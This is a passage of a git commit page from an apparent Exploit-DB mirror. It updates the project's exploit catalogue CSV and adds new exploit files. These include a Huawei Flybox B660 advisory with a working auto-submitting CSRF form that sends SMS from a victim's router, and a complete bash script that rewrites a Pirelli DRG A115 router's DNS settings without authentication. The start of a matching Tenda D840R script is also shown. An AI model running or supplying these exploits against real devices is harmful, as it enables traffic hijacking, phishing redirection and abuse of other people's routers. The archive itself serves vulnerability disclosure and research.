bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-01-17

Browse source 
11 new exploits

Nofeel FTP Server 3.6 - (CWD) Remote Memory Consumption Exploit
Nofeel FTP Server 3.6 - 'CWD' Command Remote Memory Consumption

Mozilla Firefox < 50.1.0 - Use After Free
Mozilla Firefox < 50.1.0 - Use-After-Free

HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (1)
Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (1)

HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (3)
Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (3)

HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (2)
Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (2)

HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (4)
Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (4)

iSelect v1.4 - Local Buffer Overflow

Word Viewer OCX 3.2 - ActiveX (Save) Remote File Overwrite
Word Viewer OCX 3.2 ActiveX - (Save) Remote File Overwrite
WinaXe Plus 8.7 - Buffer Overflow
DiskBoss Enterprise - GET Buffer Overflow (Metasploit)

Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)
Photobase 1.2 - 'Language' Local File Inclusion
Joomla! Component Portfol - (vcatid) SQL Injection
Photobase 1.2 - 'Language' Parameter Local File Inclusion
Joomla! Component Portfol 1.2 - 'vcatid' Parameter SQL Injection

dMx READY (25 - Products) Remote Database Disclosure
dMx READY (25 - Products) - Remote Database Disclosure

Joomla! Component com_gigcal (gigcal_gigs_id) 1.0 - SQL Injection
Joomla! Component GigCalendar 1.0 - SQL Injection

HSPell 1.1 - (cilla.cgi) Remote Command Execution
HSPell 1.1 - 'cilla.cgi' Remote Command Execution

PHP Photo Album 0.8b - (index.php preview) Local File Inclusion
PHP Photo Album 0.8b - 'preview' Parameter Local File Inclusion
Huawei Flybox B660 - Cross-Site Request Forgery
Business Networking Script 8.11 - SQL Injection / Cross-Site Scripting
Pirelli DRG A115 ADSL Router - Unauthenticated DNS Change
Tenda ADSL2/2+ Modem D840R - Unauthenticated DNS Change
Image Sharing Script 4.13 - Multiple Vulnerabilities
Million Pixels 3 - Authentication Bypass
ManagEnegine ADManager Plus 6.5.40 - Multiple Vulnerabilities
This commit is contained in:
Offensive Security 2017-01-17 05:01:17 +00:00
parent b086c09178
commit 7c1c496c25
12 changed files with 1639 additions and 13 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

37
files.csv
View file

@ -909,7 +909,7 @@ id,file,description,date,author,platform,type,port
7742,platforms/windows/dos/7742.txt,"Winamp 5.541 - '.mp3'/'.aiff' Multiple Denial of Services",2009-01-12,securfrog,windows,dos,0
7750,platforms/windows/dos/7750.html,"PowerPoint Viewer OCX 3.1 - Remote File Overwrite",2009-01-13,Stack,windows,dos,0
7751,platforms/windows/dos/7751.pl,"dBpowerAMP Audio Player 2 - '.pls' Local Buffer Overflow (PoC)",2009-01-13,Stack,windows,dos,0
7756,platforms/windows/dos/7756.py,"Nofeel FTP Server 3.6 - (CWD) Remote Memory Consumption Exploit",2009-01-13,His0k4,windows,dos,0
7756,platforms/windows/dos/7756.py,"Nofeel FTP Server 3.6 - 'CWD' Command Remote Memory Consumption",2009-01-13,His0k4,windows,dos,0
7776,platforms/hardware/dos/7776.c,"Cisco - VLAN Trunking Protocol Denial of Service",2009-01-14,showrun,hardware,dos,0
7785,platforms/multiple/dos/7785.py,"Oracle TimesTen - Remote Format String (PoC)",2009-01-14,"Joxean Koret",multiple,dos,0
7790,platforms/windows/dos/7790.txt,"netsurf Web browser 1.2 - Multiple Vulnerabilities",2009-01-14,"Jeremy Brown",windows,dos,0
@ -5340,7 +5340,7 @@ id,file,description,date,author,platform,type,port
41018,platforms/windows/dos/41018.txt,"Boxoft Wav 1.0 - Buffer Overflow",2017-01-11,Vulnerability-Lab,windows,dos,0
41025,platforms/windows/dos/41025.txt,"VideoLAN VLC Media Player 2.2.1 - 'DecodeAdpcmImaQT' Buffer Overflow",2016-05-27,"Patrick Coleman",windows,dos,0
41030,platforms/windows/dos/41030.py,"SapLPD 7.40 - Denial of Service",2016-12-28,"Peter Baris",windows,dos,0
41042,platforms/windows/dos/41042.html,"Mozilla Firefox < 50.1.0 - Use After Free",2017-01-13,"Marcin Ressel",windows,dos,0
41042,platforms/windows/dos/41042.html,"Mozilla Firefox < 50.1.0 - Use-After-Free",2017-01-13,"Marcin Ressel",windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -6284,7 +6284,7 @@ id,file,description,date,author,platform,type,port
10313,platforms/linux/local/10313.c,"Libmodplug - 's3m' Remote Buffer Overflow",2008-02-25,dummy,linux,local,0
10319,platforms/windows/local/10319.py,"PointDev IDEAL Administration 2009 9.7 - Local Buffer Overflow",2009-12-05,Dr_IDE,windows,local,0
10320,platforms/windows/local/10320.py,"M3U To ASX-WPL 1.1 - '.m3u' Buffer Overflow",2009-12-05,Encrypt3d.M!nd,windows,local,0
10321,platforms/windows/local/10321.py,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (1)",2009-12-05,Encrypt3d.M!nd,windows,local,0
10321,platforms/windows/local/10321.py,"Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (1)",2009-12-05,Encrypt3d.M!nd,windows,local,0
10322,platforms/windows/local/10322.py,"Audacity 1.2.6 - '.gro' Buffer Overflow",2009-12-05,Encrypt3d.M!nd,windows,local,0
10323,platforms/windows/local/10323.py,"HTML Help Workshop 4.74 - (hhp) Buffer Overflow (Universal)",2009-12-05,Dz_attacker,windows,local,0
10326,platforms/multiple/local/10326.txt,"Ghostscript < 8.64 - 'gdevpdtb.c' Buffer Overflow",2009-02-03,"Wolfgang Hamann",multiple,local,0
@ -6713,7 +6713,7 @@ id,file,description,date,author,platform,type,port
16627,platforms/windows/local/16627.rb,"UltraISO - '.cue' File Parsing Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0
16628,platforms/windows/local/16628.rb,"Fat Player Media Player 0.6b0 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
16629,platforms/windows/local/16629.rb,"VideoLAN VLC Media Player 0.9.4 - TiVo Buffer Overflow (Metasploit)",2011-02-02,Metasploit,windows,local,0
16631,platforms/windows/local/16631.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (3)",2010-09-25,Metasploit,windows,local,0
16631,platforms/windows/local/16631.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (3)",2010-09-25,Metasploit,windows,local,0
16632,platforms/windows/local/16632.rb,"ACDSee - '.XPM' File Section Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
16633,platforms/windows/local/16633.rb,"Steinberg MyMP3Player 3.0 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
16634,platforms/windows/local/16634.rb,"Free Download Manager - Torrent Parsing Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
@ -6725,7 +6725,7 @@ id,file,description,date,author,platform,type,port
16644,platforms/windows/local/16644.rb,"VariCAD 2010-2.05 EN - '.DWB' Stack Buffer Overflow (Metasploit)",2010-04-05,Metasploit,windows,local,0
16645,platforms/windows/local/16645.rb,"URSoft W32Dasm 8.93 - Disassembler Function Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
16646,platforms/windows/local/16646.rb,"HT-MP3Player 1.0 - '.HT3' File Parsing Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0
16648,platforms/windows/local/16648.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
16648,platforms/windows/local/16648.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
16650,platforms/windows/local/16650.rb,"Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
16651,platforms/windows/local/16651.rb,"AOL 9.5 - Phobos.Playlist Import() Stack Based Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
16652,platforms/windows/local/16652.rb,"Adobe - FlateDecode Stream Predictor 02 Integer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
@ -6758,7 +6758,7 @@ id,file,description,date,author,platform,type,port
16680,platforms/windows/local/16680.rb,"Microsoft Visual Basic - '.VBP' Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
16681,platforms/windows/local/16681.rb,"Adobe - Collab.getIcon() Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
16682,platforms/windows/local/16682.rb,"Adobe PDF - Escape EXE Social Engineering (No JavaScript)(Metasploit)",2010-12-16,Metasploit,windows,local,0
16683,platforms/windows/local/16683.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (4)",2010-09-25,Metasploit,windows,local,0
16683,platforms/windows/local/16683.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (4)",2010-09-25,Metasploit,windows,local,0
16684,platforms/windows/local/16684.rb,"Destiny Media Player 1.61 - PLS .m3u Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0
16686,platforms/windows/local/16686.rb,"Microsoft Word - '.RTF' pFragments Stack Buffer Overflow (File Format) (MS10-087) (Metasploit)",2011-03-04,Metasploit,windows,local,0
16687,platforms/windows/local/16687.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
@ -8755,6 +8755,7 @@ id,file,description,date,author,platform,type,port
41020,platforms/windows/local/41020.c,"Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)",2017-01-03,Saif,windows,local,0
41021,platforms/multiple/local/41021.txt,"Cemu 1.6.4b - Information Leak / Buffer Overflow (Emulator Breakout)",2017-01-09,Wack0,multiple,local,0
41022,platforms/linux/local/41022.txt,"Firejail - Privilege Escalation",2017-01-09,"Daniel Hodson",linux,local,0
41076,platforms/linux/local/41076.py,"iSelect v1.4 - Local Buffer Overflow",2017-01-16,"Juan Sacco",linux,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -9848,7 +9849,7 @@ id,file,description,date,author,platform,type,port
7706,platforms/windows/remote/7706.mrc,"Anope IRC Services With bs_fantasy_ext 1.2.0-RC1 - mIRC script",2009-01-08,Phil,windows,remote,0
7712,platforms/hardware/remote/7712.txt,"Netgear WG102 - Leaks SNMP Write Password With Read Access",2009-01-09,"Harm S.I. Vaittes",hardware,remote,0
7739,platforms/windows/remote/7739.html,"ExcelOCX ActiveX 3.2 - Download File Insecure Method Exploit",2009-01-12,"Alfons Luja",windows,remote,0
7747,platforms/windows/remote/7747.html,"Word Viewer OCX 3.2 - ActiveX (Save) Remote File Overwrite",2009-01-13,Houssamix,windows,remote,0
7747,platforms/windows/remote/7747.html,"Word Viewer OCX 3.2 ActiveX - (Save) Remote File Overwrite",2009-01-13,Houssamix,windows,remote,0
7748,platforms/windows/remote/7748.html,"Office Viewer ActiveX Control 3.0.1 - 'Save' Remote File Overwrite",2009-01-13,Houssamix,windows,remote,0
7749,platforms/windows/remote/7749.html,"Office Viewer ActiveX Control 3.0.1 - Remote Command Execution",2009-01-13,Houssamix,windows,remote,0
7755,platforms/windows/remote/7755.html,"PowerPoint Viewer OCX 3.1 - Remote Command Execution",2009-01-13,Cyber-Zone,windows,remote,0
@ -15219,6 +15220,8 @@ id,file,description,date,author,platform,type,port
41003,platforms/windows/remote/41003.py,"DiskBoss Enterprise 7.5.12 - 'POST' Buffer Overflow (SEH)",2017-01-10,"Wyndell Bibera",windows,remote,0
41013,platforms/linux/remote/41013.txt,"Ansible 2.1.4 / 2.2.1 - Command Execution",2017-01-09,Computest,linux,remote,0
41041,platforms/linux/remote/41041.rb,"Cisco Firepower Management Console 6.0 - Post Authentication UserAdd",2017-01-13,Metasploit,linux,remote,0
41073,platforms/windows/remote/41073.py,"WinaXe Plus 8.7 - Buffer Overflow",2017-01-16,"Peter Baris",windows,remote,0
41079,platforms/windows/remote/41079.rb,"DiskBoss Enterprise - GET Buffer Overflow (Metasploit)",2017-01-16,Metasploit,windows,remote,80
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -15824,6 +15827,7 @@ id,file,description,date,author,platform,type,port
40872,platforms/lin_x86/shellcode/40872.c,"Linux/x86 - Netcat (-e option disabled) Reverse Shell Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",lin_x86,shellcode,0
40924,platforms/lin_x86/shellcode/40924.c,"Linux/x86 - /bin/bash -c Arbitrary Command Execution Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",lin_x86,shellcode,0
40981,platforms/win_x86-64/shellcode/40981.c,"Windows x64 - Password Protected Bind Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
41072,platforms/win_x86-64/shellcode/41072.c,"Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@ -20467,18 +20471,18 @@ id,file,description,date,author,platform,type,port
7730,platforms/php/webapps/7730.txt,"Social Engine - SQL Injection",2009-01-11,snakespc,php,webapps,0
7731,platforms/php/webapps/7731.txt,"fttss 2.0 - Remote Command Execution",2009-01-11,dun,php,webapps,0
7732,platforms/php/webapps/7732.php,"Silentum Uploader 1.4.0 - Remote File Deletion",2009-01-11,"Danny Moules",php,webapps,0
7733,platforms/php/webapps/7733.txt,"Photobase 1.2 - 'Language' Local File Inclusion",2009-01-11,Osirys,php,webapps,0
7734,platforms/php/webapps/7734.txt,"Joomla! Component Portfol - (vcatid) SQL Injection",2009-01-12,H!tm@N,php,webapps,0
7733,platforms/php/webapps/7733.txt,"Photobase 1.2 - 'Language' Parameter Local File Inclusion",2009-01-11,Osirys,php,webapps,0
7734,platforms/php/webapps/7734.txt,"Joomla! Component Portfol 1.2 - 'vcatid' Parameter SQL Injection",2009-01-12,H!tm@N,php,webapps,0
7735,platforms/php/webapps/7735.pl,"Simple Machines Forum (SMF) 1.0.13 / 1.1.5 - 'Destroyer 0.1' Password Reset Security Bypass",2009-01-12,Xianur0,php,webapps,0
7736,platforms/asp/webapps/7736.htm,"Comersus Shopping Cart 6.0 - Remote User Pass Exploit",2009-01-12,ajann,asp,webapps,0
7738,platforms/php/webapps/7738.txt,"WordPress Plugin WP-Forum 1.7.8 - SQL Injection",2009-01-12,seomafia,php,webapps,0
7740,platforms/php/webapps/7740.txt,"PWP Wiki Processor 1-5-1 - Arbitrary File Upload",2009-01-12,ahmadbady,php,webapps,0
7741,platforms/asp/webapps/7741.txt,"dMx READY (25 - Products) Remote Database Disclosure",2009-01-12,Cyber-Zone,asp,webapps,0
7741,platforms/asp/webapps/7741.txt,"dMx READY (25 - Products) - Remote Database Disclosure",2009-01-12,Cyber-Zone,asp,webapps,0
7743,platforms/php/webapps/7743.txt,"Realtor 747 - 'define.php INC_DIR' Remote File Inclusion",2009-01-12,ahmadbady,php,webapps,0
7744,platforms/asp/webapps/7744.txt,"Virtual Guestbook 2.1 - Remote Database Disclosure",2009-01-13,Moudi,asp,webapps,0
7746,platforms/php/webapps/7746.txt,"Joomla! Component com_gigcal (gigcal_gigs_id) 1.0 - SQL Injection",2009-01-13,boom3rang,php,webapps,0
7746,platforms/php/webapps/7746.txt,"Joomla! Component GigCalendar 1.0 - SQL Injection",2009-01-13,boom3rang,php,webapps,0
7752,platforms/asp/webapps/7752.txt,"DMXReady News Manager 1.1 - Arbitrary Category Change",2009-01-13,ajann,asp,webapps,0
7753,platforms/cgi/webapps/7753.pl,"HSPell 1.1 - (cilla.cgi) Remote Command Execution",2009-01-13,ZeN,cgi,webapps,0
7753,platforms/cgi/webapps/7753.pl,"HSPell 1.1 - 'cilla.cgi' Remote Command Execution",2009-01-13,ZeN,cgi,webapps,0
7754,platforms/asp/webapps/7754.txt,"DMXReady Account List Manager 1.1 - Contents Change",2009-01-13,ajann,asp,webapps,0
7758,platforms/php/webapps/7758.txt,"Dark Age CMS 0.2c Beta - Authentication Bypass",2009-01-13,darkjoker,php,webapps,0
7759,platforms/php/webapps/7759.txt,"Syzygy CMS 0.3 - Authentication Bypass",2009-01-14,darkjoker,php,webapps,0
@ -20500,7 +20504,7 @@ id,file,description,date,author,platform,type,port
7782,platforms/asp/webapps/7782.txt,"DMXReady PayPal Store Manager 1.1 - Contents Change",2009-01-14,ajann,asp,webapps,0
7783,platforms/asp/webapps/7783.txt,"DMXReady Photo Gallery Manager 1.1 - Contents Change",2009-01-14,ajann,asp,webapps,0
7784,platforms/asp/webapps/7784.txt,"DMXReady Registration Manager 1.1 - Contents Change",2009-01-14,ajann,asp,webapps,0
7786,platforms/php/webapps/7786.txt,"PHP Photo Album 0.8b - (index.php preview) Local File Inclusion",2009-01-14,Osirys,php,webapps,0
7786,platforms/php/webapps/7786.txt,"PHP Photo Album 0.8b - 'preview' Parameter Local File Inclusion",2009-01-14,Osirys,php,webapps,0
7787,platforms/php/webapps/7787.txt,"DMXReady Secure Document Library 1.1 - SQL Injection",2009-01-14,ajann,php,webapps,0
7788,platforms/asp/webapps/7788.txt,"DMXReady BillboardManager 1.1 - Contents Change",2009-01-14,x0r,asp,webapps,0
7789,platforms/asp/webapps/7789.txt,"DMXReady SDK 1.1 - Arbitrary File Download",2009-01-14,ajann,asp,webapps,0
@ -37008,3 +37012,10 @@ id,file,description,date,author,platform,type,port
41068,platforms/php/webapps/41068.txt,"MC Inventory Manager Script - Multiple Vulnerabilities",2017-01-15,"Ihsan Sencan",php,webapps,0
41070,platforms/php/webapps/41070.txt,"MC Coming Soon Script - Arbitrary File Upload / Improper Access Restrictions",2017-01-15,"Ihsan Sencan",php,webapps,0
41071,platforms/php/webapps/41071.txt,"MC Documentation Creator Script - SQL Injection",2017-01-15,"Ihsan Sencan",php,webapps,0
41074,platforms/hardware/webapps/41074.txt,"Huawei Flybox B660 - Cross-Site Request Forgery",2017-01-12,Vulnerability-Lab,hardware,webapps,0
41075,platforms/php/webapps/41075.txt,"Business Networking Script 8.11 - SQL Injection / Cross-Site Scripting",2017-01-16,"Ahmet Gurel",php,webapps,0
41077,platforms/hardware/webapps/41077.sh,"Pirelli DRG A115 ADSL Router - Unauthenticated DNS Change",2017-01-16,"Todor Donev",hardware,webapps,0
41078,platforms/hardware/webapps/41078.sh,"Tenda ADSL2/2+ Modem D840R - Unauthenticated DNS Change",2017-01-16,"Todor Donev",hardware,webapps,0
41080,platforms/php/webapps/41080.txt,"Image Sharing Script 4.13 - Multiple Vulnerabilities",2017-01-16,"Hasan Emre Ozer",php,webapps,0
41081,platforms/php/webapps/41081.txt,"Million Pixels 3 - Authentication Bypass",2017-01-16,"Ihsan Sencan",php,webapps,0
41082,platforms/java/webapps/41082.txt,"ManagEnegine ADManager Plus 6.5.40 - Multiple Vulnerabilities",2017-01-08,"Mehmet Ince",java,webapps,0

Can't render this file because it is too large.

206
platforms/hardware/webapps/41074.txt Executable file
View file

@ -0,0 +1,206 @@
Document Title:
===============
Huawei Flybox B660 - (POST SMS) CSRF Web Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2026
Release Date:
=============
2017-01-12
Vulnerability Laboratory ID (VL-ID):
====================================
2026
Common Vulnerability Scoring System:
====================================
4.4
Product & Service Introduction:
===============================
The Huawei B660 has a web interface for configuration. You can use any web browser you like to login to the Huawei B660.
(Copy of the Homepage: http://setuprouter.com/router/huawei/b660/manual-1184.pdf )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a security flaw that affects the official Huawei Flybox B660 3G/4G router product series.
Vulnerability Disclosure Timeline:
==================================
2017-01-12: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Huawei
Product: Flybox - Router (Web-Application) B660 3G/4G
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A remote cross-site request forgery vulnerability has been discovered in the official Huawei Flybox B660 3G/4G router product series.
The security vulnerability allows a remote attacker to perform unauthenticated application requests with non-expired browser session
credentials to unauthorized execute specific backend functions.
The vulnerability is located in the `/htmlcode/html/sms.cgi` and `/htmlcode/html/sms_new.asp` modules and the `RequestFile` parameter
of the localhost path URL. Remote attackers are able to send sms messages as malicious bomb to other phone numbers from any Huawei
Flybox B660 via unauthenticated POST method request.
The security risk of the csrf web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.4.
Exploitation of the csrf web vulnerability requires a low privilege web-application user account and medium or high user interaction.
Successful exploitation of the vulnerability results in unauthenticated application requests and manipulation of affected or connected
device backend modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] /htmlcode/html/sms.cgi
[+] /htmlcode/html/sms_new.asp
Vulnerable Parameter(s):
[+] RequestFile
Software version of the modem:
1066.12.15.01.200
Hardware version of the modem:
WLB3TCLU
Name of the device:
B660
Hardware version of the router:
WL1B660I001
Software version of the router:
1066.11.15.02.110sp01
Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers without privilege web-application user account and with medium or high user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: CSRF Exploit
<html>
<!-- CSRF PoC By SaifAllah benMassaoud -->
<body>
<form id="test" action="http://localhost/htmlcode/html/sms.cgi?RequestFile=/htmlcode/html/sms_new.asp" method="POST">
<input type="hidden" name="action" value="Send" />
<input type="hidden" name="action" value="Send" />
<input type="hidden" name="sms&#95;text&#95;mode" value="1" />
<input type="hidden" name="sms&#95;content&#95;1" value="[Malicious Site + IP Adress/Redirection + File]:=[download]" />
<input type="hidden" name="sms&#95;num" value="1" />
<input type="hidden" name="phone&#95;numbers" value="[Victim PhoneNumber]" />
<input type="hidden" name="page" value="sms&#95;new&#46;asp" />
</form>
<script>document.getElementById('test').submit();</script>
</body>
</html>
--- PoC Session Logs [POST] ---
/htmlcode/html/sms.cgi?RequestFile=/htmlcode/html/sms_new.asp HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/htmlcode/html/sms.cgi?RequestFile=/htmlcode/html/sms.asp
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 2059
action=Send&action=Send&sms_text_mode=1&sms_content_1=‡Malicious Site + IP Adress/Redirection + File‰:=‡download‰&sms_num=1&station=
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,&phone_numbers=[Victim PhoneNumber]&page=sms_new.asp
HTTP/1.1 200 OK
CACHE-CONTROL: no-cache
Content-Type: text/html
Content-Length: 364
<html><script src="http://cakecdn.info/ad_20160927.js?ver=1&channel=1" id="{6AF30038-1A5F-46F9-AE73-455BB857D493}"></script>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>replace</title>
<body>
<script language="JavaScript" type="text/javascript">
var pageName = '/';
top.location.replace(pageName);
</script>
</body>
</html>
Note: Attackers can as well put an auto-submit java-script generated form inside an high traffic website tp exploit.
Security Risk:
==============
The security risk of the cross site request forgery vulnerability in the Huawei Flybox B660 3G/4G router product series is estimated as medium. (CVSS 4.4)
Credits & Authors:
==================
SaifAllah benMassaoud - ( http://www.vulnerability-lab.com/show.php?user=SaifAllahbenMassaoud )
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.
Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

83
platforms/hardware/webapps/41077.sh Executable file
View file

@ -0,0 +1,83 @@
#!/bin/bash
#
# Pirelli DRG A115 ADSL Router
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# The malicious code doesn't sleeping, he stalking..
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " Pirelli DRG A115 "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1

83
platforms/hardware/webapps/41078.sh Executable file
View file

@ -0,0 +1,83 @@
#!/bin/bash
#
# Tenda ADSL2/2+ Modem D840R
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
